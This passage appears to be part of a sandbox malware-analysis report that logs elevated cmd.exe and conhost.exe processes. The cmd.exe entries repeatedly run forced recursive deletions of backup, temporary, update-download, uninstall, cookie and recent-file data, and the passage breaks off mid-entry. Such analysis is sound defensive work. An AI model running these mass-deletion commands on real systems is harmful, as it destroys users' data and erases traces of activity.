                              Target ID:31
                              Start time:03:14:05
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:32
                              Start time:03:14:05
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:33
                              Start time:03:14:05
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:34
                              Start time:03:14:05
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:35
                              Start time:03:14:05
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:36
                              Start time:03:14:05
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:37
                              Start time:03:14:05
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:38
                              Start time:03:14:05
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:39
                              Start time:03:14:06
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:40
                              Start time:03:14:06
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:42
                              Start time:03:14:06
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:44
                              Start time:03:14:32
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:45
                              Start time:03:14:32
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:46
                              Start time:03:14:32
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:47
                              Start time:03:14:32
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:48
                              Start time:03:14:32
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:49
                              Start time:03:14:32
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:50
                              Start time:03:14:32
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:51
                              Start time:03:14:32
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:52
                              Start time:03:14:32
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:53
                              Start time:03:14:32
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:54
                              Start time:03:14:32
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:55
                              Start time:03:14:33
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:56
                              Start time:03:14:33
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:57
                              Start time:03:14:33
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:58
                              Start time:03:14:33
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:59
                              Start time:03:14:33
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:60
                              Start time:03:15:00
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:61
                              Start time:03:15:00
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:62
                              Start time:03:15:00
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:63
                              Start time:03:15:01
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:64
                              Start time:03:15:01
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:65
                              Start time:03:15:01
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:66
                              Start time:03:15:01
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:67
                              Start time:03:15:01
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:68
                              Start time:03:15:01
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:69
                              Start time:03:15:01
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:70
                              Start time:03:15:01
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:71
                              Start time:03:15:01
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:72
                              Start time:03:15:01
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:73
                              Start time:03:15:01
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:74
                              Start time:03:15:02
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:75
                              Start time:03:15:02
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:77
                              Start time:03:15:45
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:false

                              Target ID:78
                              Start time:03:15:45
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:false

                              Target ID:79
                              Start time:03:15:45
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:80
                              Start time:03:15:45
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:81
                              Start time:03:15:45
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:82
                              Start time:03:15:45
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:83
                              Start time:03:15:45
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:false

                              Target ID:84
                              Start time:03:15:45
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:false

                              Target ID:85
                              Start time:03:15:45
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:86
                              Start time:03:15:45
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:87
                              Start time:03:15:45
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:88
                              Start time:03:15:45
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:89
                              Start time:03:15:45
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:90
                              Start time:03:15:46
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:91
                              Start time:03:15:46
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:92
                              Start time:03:15:46
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:93
                              Start time:03:16:05
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:false

                              Target ID:94
                              Start time:03:16:05
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:false

                              Target ID:95
                              Start time:03:16:05
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:false

                              Target ID:96
                              Start time:03:16:05
                              Start date:23/12/2024
